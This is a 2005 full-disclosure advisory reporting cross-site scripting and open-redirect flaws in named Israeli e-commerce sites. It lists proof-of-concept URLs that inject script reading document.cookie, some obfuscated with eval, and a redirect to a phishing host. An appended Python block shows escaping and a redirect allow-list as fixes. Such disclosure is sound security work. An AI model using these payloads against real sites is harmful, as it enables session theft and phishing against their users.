Leading Israeli e-commerce sites XSS vulnerabilities advisory
URL:
http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff
Introduction
Many leading Israeli e-commerce sites can be abused for phishing, and contain pages which allow injecting code that executes arbitrary scripts.
Technical Details
Many leading Israeli e-commerce sites generate dynamic HTML web pages from user-submitted data and from data taken from other sources. Most of these sites do not filter that data before presenting it back to the user, and are therefore vulnerable to Cross-Site Scripting: they allow injecting code that can execute arbitrary scripts, steal the user's cookie, or display fake pages.
The P1000 web site allows redirecting to external pages through a simple query-string parameter, which can easily be exploited by phishers.
Examples
NetAction:
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com
Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>alert(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseover=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"
Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</script>
GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.cookie)</script>
Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=<script>alert(document.cookie)</script>
NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>
Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail='><script>alert(document.cookie)</script>
Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.cookie)</script>&type=1&rtype=1
Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)</script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_dot.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>
Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="http://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.cookie)"></iframe>
Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(document.cookie)</script>
One (This is actually a leading sport website, but it has a paid premium section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data="">
http://www.one.co.il/search/MoreArticals.asp?data="">
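Added example, not part of the original advisory: the reflection pattern described under Technical Details, shown as the unfiltered render beside its HTML-encoded form, with a parser-based check that shows where the injected tag appears, plus an allow-list guard for a P1000-style urladd redirect parameter. The host name and sample inputs are constructed for the illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample inputs of the shape the advisory describes (not taken from any live site).
SAMPLE_KEYWORD = '<script>alert(document.cookie)</script>'
SAMPLE_NAME = '"><script>alert(document.cookie)</script>'
SITE_HOST = 'www.example-shop.co.il'  # hypothetical host for the redirect check

def render_unfiltered(keyword):
    """Vulnerable pattern: the query-string value is written into the page verbatim."""
    return f'<p>Results for: {keyword}</p>'

def render_escaped(keyword):
    """Hardened form: HTML-encode the value before it reaches text content."""
    return f'<p>Results for: {html.escape(keyword, quote=True)}</p>'

def render_attr_unfiltered(name):
    """Vulnerable pattern inside an attribute; a leading quote breaks out of the value."""
    return f'<input name="name" value="{name}">'

def render_attr_escaped(name):
    """Hardened form: quote=True also encodes \" and ', so the attribute cannot be closed early."""
    return f'<input name="name" value="{html.escape(name, quote=True)}">'

class _TagCollector(HTMLParser):
    """Records the start tags a browser-like parser sees in the rendered page."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(page):
    """Return the tag names present in rendered HTML; an injected <script> shows up here."""
    collector = _TagCollector()
    collector.feed(page)
    return collector.tags

def safe_redirect_target(urladd, allowed_host=SITE_HOST):
    """Open-redirect guard: accept only site-relative paths or absolute URLs on our own host."""
    parts = urlsplit(urladd)
    if parts.scheme == '' and parts.netloc == '':
        # Site-relative path; reject '//host' and '/\host', which browsers treat as a new host.
        if urladd.startswith('/') and urladd[1:2] not in ('/', '\\'):
            return urladd
    elif parts.scheme in ('http', 'https') and parts.hostname == allowed_host:
        # parts.hostname drops userinfo, so 'http://ours@evil/' is compared as 'evil'.
        return urladd
    return '/'  # anything else falls back to the site root
```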
Solutions
All of the sites were contacted via e-mail or a suggestion form on 27/12/2004.
Netaction, P1000, GetIt, Daka90, Arkia and Printmall have already fixed the vulnerabilities.
Wallashops, Issta and Parsi are partly fixed.
Other sites are still vulnerable; one should be careful when following a link to those sites or giving them confidential information.
Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.
Copyright © 2004-2005 Aviv Raff.
Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
